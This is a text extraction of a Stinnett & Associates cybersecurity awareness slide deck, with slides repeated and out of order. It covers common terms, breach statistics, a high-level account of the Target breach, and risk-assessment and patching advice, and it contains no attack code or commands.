CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
FIRM BACKGROUND
5
Stinnett amp Associates LLC (Stinnett) is a professional advisory firm which excels at maximizing value for both public and private
organizations Our services are designed to help clients more effectively manage risk and improve performance by streamlining processes
reducing costs and enhancing controls
Stinnett offers co-source and outsource solutions within a diverse range of services including
Process Design and Re-engineering Internal AuditGovernance Risk and Compliance
Sarbanes-Oxley Fraud Investigation Fraud Risk Assessment
Cost Recovery Information Technology Enterprise Risk Management
Doing the Right Thing
Founded in 2001 Stinnett has grown to have offices in Dallas Denver Houston Oklahoma City San
Antonio and Tulsa We provide services to several Fortune 1000 companies as well as many mid to
large size organizations with global operations
We are primarily recognized for offering relevant advisory assistance and exemplary client service with
the unique ability to deliver what our clients need Working toward solutions we have a reputation for
ldquodoing the right thingrdquo
Stinnett is a certified Womenrsquos Business Enterprise through the Womenrsquos Business
Enterprise National Council We pride ourselves on being trusted business advisors
who focus on assisting clients to reach strategic milestones positioning them for
future success
copyStinnett amp Associates LLC
LEARNING OBJECTIVES
bull Why should we be concerned with cybersecurity
bull What are some key cybersecurity definitionsbull What are some emerging cybersecurity trends
and threatsbull What happened with some recent high-profile
cybersecurity attacksbull What are some cybersecurity roadblocksbull What are steps to evaluate your companyrsquos
cybersecurity risk levelbull How can you take preventive measures and
protect yourself and your company
6
copyStinnett amp Associates LLC
MY FIRST INTRODUCTION TO A CYBER CRIMINAL
7
copyStinnett amp Associates LLC
WHAT DO ALL OF THESE ORGANIZATIONS HAVE IN COMMON
8
copyStinnett amp Associates LLC
hellipAND THESE
9
copyStinnett amp Associates LLC
hellipTHEY ALL HAVE AT LEAST TWO THINGS IN COMMON
10
ALL HAVE BEEN VICTIMS OF CYBER ATTACK amp BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
copyStinnett amp Associates LLC11
LIST OF RECENT HEADLINES
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
LEARNING OBJECTIVES
bull Why should we be concerned with cybersecurity
bull What are some key cybersecurity definitionsbull What are some emerging cybersecurity trends
and threatsbull What happened with some recent high-profile
cybersecurity attacksbull What are some cybersecurity roadblocksbull What are steps to evaluate your companyrsquos
cybersecurity risk levelbull How can you take preventive measures and
protect yourself and your company
6
copyStinnett amp Associates LLC
MY FIRST INTRODUCTION TO A CYBER CRIMINAL
7
copyStinnett amp Associates LLC
WHAT DO ALL OF THESE ORGANIZATIONS HAVE IN COMMON
8
copyStinnett amp Associates LLC
hellipAND THESE
9
copyStinnett amp Associates LLC
hellipTHEY ALL HAVE AT LEAST TWO THINGS IN COMMON
10
ALL HAVE BEEN VICTIMS OF CYBER ATTACK amp BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
copyStinnett amp Associates LLC11
LIST OF RECENT HEADLINES
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
